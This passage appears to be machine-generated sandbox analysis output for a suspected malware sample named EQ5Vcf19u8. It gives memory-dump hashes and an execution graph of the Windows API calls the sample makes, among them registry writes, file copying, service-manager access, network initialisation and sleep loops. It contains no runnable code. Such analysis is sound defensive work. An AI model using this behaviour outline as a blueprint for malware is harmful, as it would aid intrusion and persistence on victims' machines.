                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$CountCurrentFreeLibraryMessageSendTerminateTick
                                                                                        • String ID: Detected restart. Removing temporary directory.
                                                                                        • API String ID: 1717587489-3199836293
                                                                                        • Opcode ID: 281135f9a0ad5b4e488772808dcd9eaa6bf3b34c39f962a9f46887a4a11e3304
                                                                                        • Instruction ID: bb05712aa7eb36d303e19ffab6eef2c78f2a463723ea7eca767f41585c441369
                                                                                        • Opcode Fuzzy Hash: 281135f9a0ad5b4e488772808dcd9eaa6bf3b34c39f962a9f46887a4a11e3304
                                                                                        • Instruction Fuzzy Hash: BDE0E532208A406DDA1177BABC1396B7F5CDB46768B22487FF50882552D92D481CC53D
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(00000000,00498BB6), ref: 0040334B
                                                                                        • GetCommandLineA.KERNEL32(00000000,00498BB6), ref: 00403356
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: CommandHandleLineModule
                                                                                        • String ID: H6c
                                                                                        • API String ID: 2123368496-3698304253
                                                                                        • Opcode ID: 48b45b62bccbc2a8e5daf731e4078a894a727d510552ebcfe8024faf6b9ab272
                                                                                        • Instruction ID: ff8fa06d391bd0b31f892a344b3e95d40f530220570fde7b1ba7fad45aeb04f1
                                                                                        • Opcode Fuzzy Hash: 48b45b62bccbc2a8e5daf731e4078a894a727d510552ebcfe8024faf6b9ab272
                                                                                        • Instruction Fuzzy Hash: 45C002609013058AD754AF7579467162A94D751349F80447FF114BA3E1D77C82055BDD
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLastSleep
                                                                                        • String ID:
                                                                                        • API String ID: 1458359878-0
                                                                                        • Opcode ID: 1a9f46df8411143c40a07a37eb8806f02fdea1552ea3146ec5e635b784cd6770
                                                                                        • Instruction ID: f31041694d7e6b08a2ea33ec2b58b28b25921f40701f973673b956735a8b67d8
                                                                                        • Opcode Fuzzy Hash: 1a9f46df8411143c40a07a37eb8806f02fdea1552ea3146ec5e635b784cd6770
                                                                                        • Instruction Fuzzy Hash: 42F02B32705F58A78B21B56A889157FB2A8DB81366750012BFC0CD7313C878CC058BBC

                                                                                        Execution Graph

                                                                                        Execution Coverage:2.5%
                                                                                        Dynamic/Decrypted Code Coverage:69.6%
                                                                                        Signature Coverage:17.5%
                                                                                        Total number of Nodes:473
                                                                                        Total number of Limit Nodes:24
                                                                                        execution_graph 61166 401f20 61169 401301 FindResourceA 61166->61169 61168 401f2f 61170 401360 61169->61170 61171 401367 SizeofResource 61169->61171 61170->61168 61171->61170 61172 401386 LoadResource LockResource GlobalAlloc 61171->61172 61173 4013cc 61172->61173 61174 40141f GetTickCount 61173->61174 61176 40142a GlobalAlloc 61174->61176 61176->61170 61177 402a20 GetVersion 61202 403b64 HeapCreate 61177->61202 61179 402a7f 61180 402a84 61179->61180 61181 402a8c 61179->61181 61280 402b3b 8 API calls 61180->61280 61214 403844 61181->61214 61185 402a94 GetCommandLineA 61228 403712 61185->61228 61189 402aae 61260 40340c 61189->61260 61191 402ab3 61192 402ab8 GetStartupInfoA 61191->61192 61273 4033b4 61192->61273 61194 402aca GetModuleHandleA 61277 401f06 61194->61277 61203 403b84 61202->61203 61204 403bba 61202->61204 61281 403a1c 19 API calls 61203->61281 61204->61179 61206 403b89 61207 403ba0 61206->61207 61208 403b93 61206->61208 61210 403bbd 61207->61210 61283 40478c HeapAlloc VirtualAlloc VirtualAlloc VirtualFree HeapFree 61207->61283 61282 403f3b HeapAlloc 61208->61282 61210->61179 61211 403b9d 61211->61210 61213 403bae HeapDestroy 61211->61213 61213->61204 61284 402b5f 61214->61284 61217 403863 GetStartupInfoA 61220 4038af 61217->61220 61221 403974 61217->61221 61220->61221 61225 402b5f 12 API calls 61220->61225 61227 403920 61220->61227 61222 40399b GetStdHandle 61221->61222 61223 4039db SetHandleCount 61221->61223 61222->61221 61224 4039a9 GetFileType 61222->61224 61223->61185 61224->61221 61225->61220 61226 403942 GetFileType 61226->61227 61227->61221 61227->61226 61229 403760 61228->61229 61230 40372d GetEnvironmentStringsW 61228->61230 61231 403735 61229->61231 61232 403751 61229->61232 61230->61231 61233 403741 GetEnvironmentStrings 61230->61233 61235 403779 WideCharToMultiByte 61231->61235 61236 40376d GetEnvironmentStringsW 61231->61236 61234 402aa4 61232->61234 61237 4037f3 GetEnvironmentStrings 61232->61237 61238 4037ff 61232->61238 61233->61232 61233->61234 61251 4034c5 61234->61251 61240 4037ad 61235->61240 61241 4037df FreeEnvironmentStringsW 61235->61241 61236->61234 61236->61235 61237->61234 61237->61238 61242 402b5f 12 API calls 61238->61242 61243 402b5f 12 API calls 61240->61243 61241->61234 61249 40381a 61242->61249 61244 4037b3 61243->61244 61244->61241 61245 4037bc WideCharToMultiByte 61244->61245 61247 4037d6 61245->61247 61248 4037cd 61245->61248 61246 403830 FreeEnvironmentStringsA 61246->61234 61247->61241 61293 402c11 61248->61293 61249->61246 61252 4034d7 61251->61252 61253 4034dc GetModuleFileNameA 61251->61253 61306 405d24 19 API calls 61252->61306 61255 4034ff 61253->61255 61256 402b5f 12 API calls 61255->61256 61257 403520 61256->61257 61259 403530 61257->61259 61307 402b16 7 API calls 61257->61307 61259->61189 61261 403419 61260->61261 61264 40341e 61260->61264 61308 405d24 19 API calls 61261->61308 61263 402b5f 12 API calls 61265 40344b 61263->61265 61264->61263 61272 40345f 61265->61272 61309 402b16 7 API calls 61265->61309 61267 4034a2 61268 402c11 7 API calls 61267->61268 61269 4034ae 61268->61269 61269->61191 61270 402b5f 12 API calls 61270->61272 61272->61267 61272->61270 61310 402b16 7 API calls 61272->61310 61274 4033bd 61273->61274 61276 4033c2 61273->61276 61311 405d24 19 API calls 61274->61311 61276->61194 61278 4020e5 GetModuleHandleA 61277->61278 61281->61206 61282->61211 61283->61211 61288 402b71 61284->61288 61287 402b16 7 API calls 61287->61217 61290 402b6e 61288->61290 61291 402b78 61288->61291 61290->61217 61290->61287 61291->61290 61292 402b9d 12 API calls 61291->61292 61292->61291 61294 402c1d 61293->61294 61302 402c39 61293->61302 61297 402c27 61294->61297 61298 402c3d 61294->61298 61295 402c68 61296 402c69 HeapFree 61295->61296 61296->61302 61297->61296 61299 402c33 61297->61299 61298->61295 61301 402c57 61298->61301 61304 403fae VirtualFree VirtualFree HeapFree 61299->61304 61305 404a3f VirtualFree HeapFree VirtualFree 61301->61305 61302->61247 61304->61302 61305->61302 61306->61253 61307->61259 61308->61264 61309->61272 61310->61272 61311->61276 61312 401ec0 LoadLibraryExA 61313 40d090 61312->61313 61314 aefe8c 61315 b1a3d1 CreateFileA 61314->61315 61316 4018c3 RegCreateKeyExA 61317 401908 RegCloseKey 61316->61317 61319 401b83 61320 401807 lstrcmpiW 61319->61320 61321 401b92 61319->61321 61320->61321 61322 40d5a3 OpenSCManagerA 61323 40d445 61327 402940 61323->61327 61326 40d46b 61328 40294d CopyFileA 61327->61328 61328->61326 61329 401da5 61330 401daa 61329->61330 61332 401dac 61329->61332 61331 401d95 RegOpenKeyExA 61330->61331 61330->61332 61333 401f4e SetEvent 61332->61333 61335 401dcb 61332->61335 61333->61335 61336 40d5e6 CopyFileA 61337 40d5ec 61336->61337 61337->61337 61338 401ce6 61339 40d0b6 Sleep 61338->61339 61340 ab104d 61345 ac23a4 61340->61345 61351 ac22a8 61345->61351 61347 ab1057 61348 ab1aa9 InterlockedIncrement 61347->61348 61349 ab105c 61348->61349 61350 ab1ac5 WSAStartup InterlockedExchange 61348->61350 61350->61349 61352 ac22b4 ___lock_fhandle 61351->61352 61359 ac7140 61352->61359 61358 ac22db ___lock_fhandle 61358->61347 61376 ac749b 61359->61376 61361 ac22bd 61362 ac22ec RtlDecodePointer RtlDecodePointer 61361->61362 61363 ac2319 61362->61363 61364 ac22c9 61362->61364 61363->61364 61385 ac7d0d 60 API calls _vscan_fn 61363->61385 61373 ac22e6 61364->61373 61366 ac237c RtlEncodePointer RtlEncodePointer 61366->61364 61367 ac232b 61367->61366 61368 ac2350 61367->61368 61386 ac76a9 62 API calls 2 library calls 61367->61386 61368->61364 61371 ac236a RtlEncodePointer 61368->61371 61387 ac76a9 62 API calls 2 library calls 61368->61387 61371->61366 61372 ac2364 61372->61364 61372->61371 61388 ac7149 61373->61388 61377 ac74ac 61376->61377 61378 ac74bf RtlEnterCriticalSection 61376->61378 61383 ac7523 59 API calls 9 library calls 61377->61383 61378->61361 61380 ac74b2 61380->61378 61384 ac6fed 59 API calls 3 library calls 61380->61384 61383->61380 61385->61367 61386->61368 61387->61372 61391 ac7605 RtlLeaveCriticalSection 61388->61391 61390 ac22eb 61390->61358 61391->61390 61392 40d407 61396 ac2978 61392->61396 61397 ac2986 61396->61397 61398 ac2981 61396->61398 61402 ac299b 61397->61402 61410 ac917c GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 61398->61410 61401 40d409 Sleep 61403 ac29a7 ___lock_fhandle 61402->61403 61404 ac2a52 ___lock_fhandle 61403->61404 61407 ac29f5 ___DllMainCRTStartup 61403->61407 61411 ac2806 61403->61411 61404->61401 61406 ac2806 __CRT_INIT@12 138 API calls 61406->61404 61407->61404 61408 ac2806 __CRT_INIT@12 138 API calls 61407->61408 61409 ac2a2f 61407->61409 61408->61409 61409->61404 61409->61406 61410->61397 61412 ac2812 ___lock_fhandle 61411->61412 61413 ac281a 61412->61413 61414 ac2894 61412->61414 61459 ac6e46 GetProcessHeap 61413->61459 61416 ac28fd 61414->61416 61417 ac2898 61414->61417 61419 ac2960 61416->61419 61420 ac2902 61416->61420 61422 ac28b9 61417->61422 61452 ac2823 ___lock_fhandle __CRT_INIT@12 61417->61452 61548 ac7009 59 API calls _doexit 61417->61548 61418 ac281f 61418->61452 61460 ac49f4 61418->61460 61419->61452 61579 ac4884 59 API calls 2 library calls 61419->61579 61553 ac7d7b 61420->61553 61549 ac6ee0 61 API calls _free 61422->61549 61425 ac290d 61425->61452 61556 ac761a 61425->61556 61428 ac282f __RTC_Initialize 61436 ac283f GetCommandLineA 61428->61436 61428->61452 61429 ac28be 61431 ac28cf __CRT_INIT@12 61429->61431 61550 ac8e1a 60 API calls _free 61429->61550 61552 ac28e8 62 API calls __mtterm 61431->61552 61435 ac28ca 61551 ac4a6a 62 API calls 2 library calls 61435->61551 61481 ac9218 GetEnvironmentStringsW 61436->61481 61441 ac2936 61443 ac293c 61441->61443 61444 ac2954 61441->61444 61563 ac4941 61443->61563 61573 ac1f74 61444->61573 61445 ac2859 61449 ac285d 61445->61449 61513 ac8e6c 61445->61513 61448 ac2944 GetCurrentThreadId 61448->61452 61546 ac4a6a 62 API calls 2 library calls 61449->61546 61452->61407 61454 ac287d 61454->61452 61547 ac8e1a 60 API calls _free 61454->61547 61459->61418 61580 ac70b0 36 API calls 2 library calls 61460->61580 61462 ac49f9 61581 ac75cc InitializeCriticalSectionAndSpinCount ___lock_fhandle 61462->61581 61464 ac49fe 61465 ac4a02 61464->61465 61583 ac7d3e TlsAlloc 61464->61583 61582 ac4a6a 62 API calls 2 library calls 61465->61582 61468 ac4a07 61468->61428 61469 ac4a14 61469->61465 61470 ac4a1f 61469->61470 61471 ac761a __calloc_crt 59 API calls 61470->61471 61472 ac4a2c 61471->61472 61473 ac4a61 61472->61473 61584 ac7d9a TlsSetValue 61472->61584 61585 ac4a6a 62 API calls 2 library calls 61473->61585 61476 ac4a66 61476->61428 61477 ac4a40 61477->61473 61478 ac4a46 61477->61478 61479 ac4941 __initptd 59 API calls 61478->61479 61480 ac4a4e GetCurrentThreadId 61479->61480 61480->61428 61483 ac922b 61481->61483 61487 ac284f 61481->61487 61482 ac9243 WideCharToMultiByte 61484 ac925e 61482->61484 61485 ac9295 FreeEnvironmentStringsW 61482->61485 61483->61482 61483->61483 61586 ac7662 59 API calls 2 library calls 61484->61586 61485->61487 61494 ac8b66 61487->61494 61488 ac9264 61488->61485 61489 ac926b WideCharToMultiByte 61488->61489 61490 ac928a FreeEnvironmentStringsW 61489->61490 61491 ac9281 61489->61491 61490->61487 61492 ac1f74 _free 59 API calls 61491->61492 61493 ac9287 61492->61493 61493->61490 61495 ac8b72 ___lock_fhandle 61494->61495 61496 ac749b __lock 59 API calls 61495->61496 61497 ac8b79 61496->61497 61498 ac761a __calloc_crt 59 API calls 61497->61498 61499 ac8b8a 61498->61499 61500 ac8bf5 GetStartupInfoW 61499->61500 61501 ac8b95 ___lock_fhandle @_EH4_CallFilterFunc@8 61499->61501 61507 ac8c0a 61500->61507 61510 ac8d39 61500->61510 61501->61445 61502 ac8e01 61589 ac8e11 RtlLeaveCriticalSection _doexit 61502->61589 61504 ac761a __calloc_crt 59 API calls 61504->61507 61505 ac8d86 GetStdHandle 61505->61510 61506 ac8d99 GetFileType 61506->61510 61507->61504 61509 ac8c58 61507->61509 61507->61510 61508 ac8c8c GetFileType 61508->61509 61509->61508 61509->61510 61587 ac7dbc InitializeCriticalSectionAndSpinCount 61509->61587 61510->61502 61510->61505 61510->61506 61588 ac7dbc InitializeCriticalSectionAndSpinCount 61510->61588 61514 ac8e7f GetModuleFileNameA 61513->61514 61515 ac8e7a 61513->61515 61517 ac8eac 61514->61517 61596 ac3eea 71 API calls __setmbcp 61515->61596 61590 ac8f1f 61517->61590 61519 ac2869 61519->61454 61524 ac909b 61519->61524 61522 ac8ee5 61522->61519 61523 ac8f1f _parse_cmdline 59 API calls 61522->61523 61523->61519 61525 ac90a4 61524->61525 61527 ac90a9 _strlen 61524->61527 61600 ac3eea 71 API calls __setmbcp 61525->61600 61528 ac761a __calloc_crt 59 API calls 61527->61528 61531 ac2872 61527->61531 61536 ac90df _strlen 61528->61536 61529 ac9131 61530 ac1f74 _free 59 API calls 61529->61530 61530->61531 61531->61454 61540 ac7018 61531->61540 61532 ac761a __calloc_crt 59 API calls 61532->61536 61533 ac9158 61534 ac1f74 _free 59 API calls 61533->61534 61534->61531 61536->61529 61536->61531 61536->61532 61536->61533 61537 ac916f 61536->61537 61601 ac591c 59 API calls _vscan_fn 61536->61601 61602 ac3b65 8 API calls 2 library calls 61537->61602 61539 ac917b 61541 ac7024 __IsNonwritableInCurrentImage 61540->61541 61603 acab7f 61541->61603 61543 ac7042 __initterm_e 61544 ac23a4 __cinit 68 API calls 61543->61544 61545 ac7061 __cinit __IsNonwritableInCurrentImage 61543->61545 61544->61545 61545->61454 61546->61452 61547->61449 61548->61422 61549->61429 61550->61435 61551->61431 61552->61452 61554 ac7d8e 61553->61554 61555 ac7d92 TlsGetValue 61553->61555 61554->61425 61555->61425 61559 ac7621 61556->61559 61558 ac291e 61558->61452 61562 ac7d9a TlsSetValue 61558->61562 61559->61558 61561 ac763f 61559->61561 61606 ace9a8 61559->61606 61561->61558 61561->61559 61614 ac80b7 Sleep 61561->61614 61562->61441 61564 ac494d ___lock_fhandle 61563->61564 61565 ac749b __lock 59 API calls 61564->61565 61566 ac498a 61565->61566 61617 ac49e2 61566->61617 61569 ac749b __lock 59 API calls 61570 ac49ab ___addlocaleref 61569->61570 61620 ac49eb 61570->61620 61572 ac49d6 ___lock_fhandle 61572->61448 61574 ac1f7d HeapFree 61573->61574 61575 ac1fa6 __dosmaperr 61573->61575 61574->61575 61576 ac1f92 61574->61576 61575->61452 61625 ac4abb 59 API calls __getptd_noexit 61576->61625 61578 ac1f98 GetLastError 61578->61575 61579->61452 61580->61462 61581->61464 61582->61468 61583->61469 61584->61477 61585->61476 61586->61488 61587->61509 61588->61510 61589->61501 61592 ac8f41 61590->61592 61595 ac8fa5 61592->61595 61598 acef86 59 API calls x_ismbbtype_l 61592->61598 61593 ac8ec2 61593->61519 61597 ac7662 59 API calls 2 library calls 61593->61597 61595->61593 61599 acef86 59 API calls x_ismbbtype_l 61595->61599 61596->61514 61597->61522 61598->61592 61599->61595 61600->61527 61601->61536 61602->61539 61604 acab82 RtlEncodePointer 61603->61604 61604->61604 61605 acab9c 61604->61605 61605->61543 61607 ace9b3 61606->61607 61613 ace9ce 61606->61613 61608 ace9bf 61607->61608 61607->61613 61615 ac4abb 59 API calls __getptd_noexit 61608->61615 61609 ace9de RtlAllocateHeap 61611 ace9c4 61609->61611 61609->61613 61611->61559 61613->61609 61613->61611 61616 ac6e63 RtlDecodePointer 61613->61616 61614->61561 61615->61611 61616->61613 61623 ac7605 RtlLeaveCriticalSection 61617->61623 61619 ac49a4 61619->61569 61624 ac7605 RtlLeaveCriticalSection 61620->61624 61622 ac49f2 61622->61572 61623->61619 61624->61622 61625->61578 61626 40d727 61627 40e060 RegQueryValueExA 61626->61627 61631 abe9a6 LoadLibraryA 61632 abea89 61631->61632 61633 abe9cf GetProcAddress 61631->61633 61634 abea82 FreeLibrary 61633->61634 61637 abe9e3 61633->61637 61634->61632 61635 abe9f5 GetAdaptersInfo 61635->61637 61636 abea7d 61636->61634 61637->61635 61637->61636 61639 ac27b5 61637->61639 61643 ac27bd 61639->61643 61641 ac27d7 61641->61637 61643->61641 61644 ac27db std::exception::exception 61643->61644 61647 ac1fac 61643->61647 61664 ac6e63 RtlDecodePointer 61643->61664 61665 ac31ba RaiseException 61644->61665 61646 ac2805 61648 ac2027 61647->61648 61656 ac1fb8 61647->61656 61672 ac6e63 RtlDecodePointer 61648->61672 61650 ac202d 61673 ac4abb 59 API calls __getptd_noexit 61650->61673 61653 ac1feb RtlAllocateHeap 61653->61656 61663 ac201f 61653->61663 61655 ac1fc3 61655->61656 61666 ac7281 59 API calls __NMSG_WRITE 61655->61666 61667 ac72de 59 API calls 7 library calls 61655->61667 61668 ac6eca GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 61655->61668 61656->61653 61656->61655 61657 ac2013 61656->61657 61661 ac2011 61656->61661 61669 ac6e63 RtlDecodePointer 61656->61669 61670 ac4abb 59 API calls __getptd_noexit 61657->61670 61671 ac4abb 59 API calls __getptd_noexit 61661->61671 61663->61643 61664->61643 61665->61646 61666->61655 61667->61655 61669->61656 61670->61661 61671->61663 61672->61650 61673->61663 61674 ab5e59 RtlInitializeCriticalSection GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 61675 ab5ec6 GetTickCount 61674->61675 61745 ab42c7 61674->61745 61746 ab59f4 61675->61746 61678 ab5ee3 GetVersionExA 61679 ab5f24 __cftoa_l 61678->61679 61680 ac1fac _malloc 59 API calls 61679->61680 61681 ab5f31 61680->61681 61682 ac1fac _malloc 59 API calls 61681->61682 61683 ab5f41 61682->61683 61684 ac1fac _malloc 59 API calls 61683->61684 61685 ab5f4c 61684->61685 61686 ac1fac _malloc 59 API calls 61685->61686 61687 ab5f57 61686->61687 61688 ac1fac _malloc 59 API calls 61687->61688 61689 ab5f62 61688->61689 61690 ac1fac _malloc 59 API calls 61689->61690 61691 ab5f6d 61690->61691 61692 ac1fac _malloc 59 API calls 61691->61692 61693 ab5f78 61692->61693 61694 ac1fac _malloc 59 API calls 61693->61694 61695 ab5f84 6 API calls 61694->61695 61696 ab5fd1 __cftoa_l 61695->61696 61697 ab5fea RtlEnterCriticalSection RtlLeaveCriticalSection 61696->61697 61698 ac1fac _malloc 59 API calls 61697->61698 61699 ab6026 61698->61699 61700 ac1fac _malloc 59 API calls 61699->61700 61701 ab6034 61700->61701 61702 ac1fac _malloc 59 API calls 61701->61702 61703 ab603b 61702->61703 61704 ac1fac _malloc 59 API calls 61703->61704 61705 ab605c QueryPerformanceCounter Sleep 61704->61705 61706 ac1fac _malloc 59 API calls 61705->61706 61707 ab6082 61706->61707 61708 ac1fac _malloc 59 API calls 61707->61708 61737 ab6092 __cftoa_l 61708->61737 61709 ab6105 RtlEnterCriticalSection RtlLeaveCriticalSection 61709->61737 61710 ab60ff Sleep 61710->61709 61711 ab635a 61712 ab6499 RtlEnterCriticalSection RtlLeaveCriticalSection 61713 ac133c 66 API calls 61712->61713 61713->61737 61714 ac1fac _malloc 59 API calls 61715 ab653b RtlEnterCriticalSection RtlLeaveCriticalSection 61714->61715 61715->61737 61716 ac133c 66 API calls 61716->61737 61717 ab67f2 RtlEnterCriticalSection RtlLeaveCriticalSection 61717->61737 61718 ab5c0c 59 API calls 61718->61737 61719 ac1418 _sprintf 79 API calls 61719->61737 61720 ab1ba7 210 API calls 61720->61737 61721 ab6957 RtlEnterCriticalSection 61722 ab6984 RtlLeaveCriticalSection 61721->61722 61721->61737 61723 ab3c67 72 API calls 61722->61723 61723->61737 61724 ac1fac _malloc 59 API calls 61724->61737 61725 ab3d7e 64 API calls 61725->61737 61726 ab7336 89 API calls 61726->61737 61727 ac25e6 65 API calls _strtok 61727->61737 61728 ab9721 73 API calls 61728->61737 61729 ab7fff 88 API calls 61729->61737 61730 ac1f74 _free 59 API calls 61730->61737 61731 ac27b5 _Allocate 60 API calls 61731->61737 61732 ab73e5 71 API calls 61732->61737 61733 ac1850 _swscanf 59 API calls 61733->61737 61734 ab33b2 86 API calls 61734->61737 61735 ab8733 212 API calls 61735->61737 61736 ab984b 60 API calls 61736->61737 61737->61709 61737->61710 61737->61711 61737->61712 61737->61714 61737->61716 61737->61717 61737->61718 61737->61719 61737->61720 61737->61721 61737->61722 61737->61724 61737->61725 61737->61726 61737->61727 61737->61728 61737->61729 61737->61730 61737->61731 61737->61732 61737->61733 61737->61734 61737->61735 61737->61736 61737->61737 61738 ab5119 103 API calls 61737->61738 61739 abc113 73 API calls 61737->61739 61740 ab9c0b 210 API calls 61737->61740 61741 ab676f Sleep 61737->61741 61743 ab676a shared_ptr 61737->61743 61738->61737 61739->61737 61740->61737 61742 ac08f0 GetProcessHeap HeapFree 61741->61742 61742->61743 61743->61737 61743->61741 61744 ab4100 GetProcessHeap HeapFree 61743->61744 61744->61743 61747 ac1fac _malloc 59 API calls 61746->61747 61748 ab5a07 61747->61748 61749 40d0d3 61752 401649 61749->61752 61753 401d22 VirtualAlloc 61752->61753 61755 4019b4 61756 40d0a1 CreateDirectoryA 61755->61756 61757 40da2f 61756->61757 61758 afe59a 61759 b2255e 61758->61759 61765 aef21d WriteFile 61759->61765 61768 af0010 61759->61768 61766 affda9 CloseHandle 61765->61766 61769 affda9 CloseHandle 61768->61769 61771 402337 61772 4022ea RegSetValueExA 61771->61772 61775 40233e 61771->61775 61774 40dc57 RegCloseKey 61772->61774 61774->61775 61775->61774 61776 40183a 61777 40df3a RegCloseKey 61776->61777 61778 aef8f2 61779 aef8ff 61778->61779 61780 aef8ac 61778->61780 61784 abe8a2 CreateFileA 61779->61784 61781 af1baf 61783 abe8a2 64 API calls 61781->61783 61783->61781 61785 abe99e 61784->61785 61787 abe8d3 61784->61787 61785->61781 61786 abe8eb DeviceIoControl 61786->61787 61787->61786 61788 abe994 CloseHandle 61787->61788 61789 abe960 GetLastError 61787->61789 61790 ac27b5 _Allocate 60 API calls 61787->61790 61788->61785 61789->61787 61789->61788 61790->61787

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 0 ab5e59-ab5ebf RtlInitializeCriticalSection GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 1 ab5ec6-ab60e7 GetTickCount call ab59f4 GetVersionExA call ac3750 call ac1fac * 8 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlAllocateHeap GetProcessHeap RtlAllocateHeap call ac3750 * 3 RtlEnterCriticalSection RtlLeaveCriticalSection call ac1fac * 4 QueryPerformanceCounter Sleep call ac1fac * 2 call ac3750 * 2 0->1 2 ab5ec1 call ab42c7 0->2 45 ab60eb-ab60ed 1->45 2->1 46 ab60ef-ab60f4 45->46 47 ab60f6-ab60f8 45->47 50 ab60ff Sleep 46->50 48 ab60fa 47->48 49 ab6105-ab6134 RtlEnterCriticalSection RtlLeaveCriticalSection 47->49 48->50 51 ab6289-ab62b7 49->51 50->49 53 ab62b9-ab62bd 51->53 54 ab632b-ab6331 53->54 55 ab62bf-ab62c3 53->55 56 ab6388-ab638b 54->56 57 ab6332 54->57 58 ab62c5 55->58 60 ab638e-ab638f 56->60 57->56 59 ab6334-ab633e 57->59 58->51 61 ab62c7-ab62c9 58->61 62 ab63b7-ab63c8 59->62 63 ab636b-ab6372 60->63 64 ab6391 60->64 65 ab62ce-ab62d8 61->65 66 ab63ca-ab63e0 62->66 67 ab63e7 62->67 68 ab63e1-ab63e4 63->68 69 ab6374-ab6383 63->69 70 ab6395-ab63a2 64->70 65->53 71 ab62da-ab6304 65->71 66->68 67->60 72 ab63e9-ab6443 67->72 68->67 73 ab635a 69->73 74 ab6385 69->74 70->70 75 ab63a4-ab63b2 70->75 71->65 79 ab6306-ab6315 71->79 77 ab645f-ab6469 72->77 78 ab6445-ab644b 72->78 74->56 75->62 77->45 82 ab646f-ab6493 call ac3750 call ab439c 77->82 80 ab644d-ab644f 78->80 81 ab6451-ab645e call ab534d 78->81 79->58 83 ab6317-ab6327 79->83 80->77 81->77 82->45 90 ab6499-ab64c4 RtlEnterCriticalSection RtlLeaveCriticalSection call ac133c 82->90 83->54 93 ab650e-ab6526 call ac133c 90->93 94 ab64c6-ab64d5 call ac133c 90->94 99 ab67cd-ab67dc call ac133c 93->99 100 ab652c-ab652e 93->100 94->93 101 ab64d7-ab64e6 call ac133c 94->101 108 ab67de-ab67e0 99->108 109 ab6821-ab6830 call ac133c 99->109 100->99 103 ab6534-ab65df call ac1fac RtlEnterCriticalSection RtlLeaveCriticalSection call ac3750 * 5 call ab439c * 2 100->103 101->93 111 ab64e8-ab64f7 call ac133c 101->111 153 ab661c 103->153 154 ab65e1-ab65e3 103->154 108->109 112 ab67e2-ab681c call ac3750 RtlEnterCriticalSection RtlLeaveCriticalSection 108->112 122 ab6832 call ab5c0c 109->122 123 ab6845-ab6854 call ac133c 109->123 111->93 124 ab64f9-ab6508 call ac133c 111->124 112->45 131 ab6837-ab6840 call ab5d1a 122->131 123->45 133 ab685a-ab685c 123->133 124->45 124->93 131->45 133->45 136 ab6862-ab687b call ab439c 133->136 136->45 143 ab6881-ab6950 call ac1418 call ab1ba7 136->143 155 ab6952 call ab143f 143->155 156 ab6957-ab6978 RtlEnterCriticalSection 143->156 158 ab6620-ab664e call ac1fac call ac3750 call ab439c 153->158 154->153 157 ab65e5-ab65f7 call ac133c 154->157 155->156 160 ab697a-ab6981 156->160 161 ab6984-ab69eb RtlLeaveCriticalSection call ab3c67 call ab3d7e call ab7336 156->161 157->153 169 ab65f9-ab661a call ab439c 157->169 179 ab668f-ab6698 call ac1f74 158->179 180 ab6650-ab665f call ac25e6 158->180 160->161 181 ab6b53-ab6b67 call ab7fff 161->181 182 ab69f1-ab6a33 call ab9721 161->182 169->158 191 ab67bb-ab67c8 179->191 192 ab669e-ab66b6 call ac27b5 179->192 180->179 193 ab6661 180->193 181->45 194 ab6a39-ab6a40 182->194 195 ab6b1d-ab6b4e call ab73e5 call ab33b2 182->195 191->45 204 ab66b8-ab66c0 call ab8733 192->204 205 ab66c2 192->205 197 ab6666-ab6678 call ac1850 193->197 199 ab6a43-ab6a48 194->199 195->181 211 ab667a 197->211 212 ab667d-ab668d call ac25e6 197->212 199->199 203 ab6a4a-ab6a8f call ab9721 199->203 203->195 217 ab6a95-ab6a9b 203->217 210 ab66c4-ab6752 call ab984b call ab3863 call ab5119 call ab3863 call ab9af1 call ab9c0b 204->210 205->210 236 ab6757-ab6768 210->236 211->212 212->179 212->197 218 ab6a9e-ab6aa3 217->218 218->218 221 ab6aa5-ab6ae0 call ab9721 218->221 221->195 227 ab6ae2-ab6b1c call abc113 221->227 227->195 237 ab676a call ab380b 236->237 238 ab676f-ab679a Sleep call ac08f0 236->238 237->238 242 ab679c-ab67a5 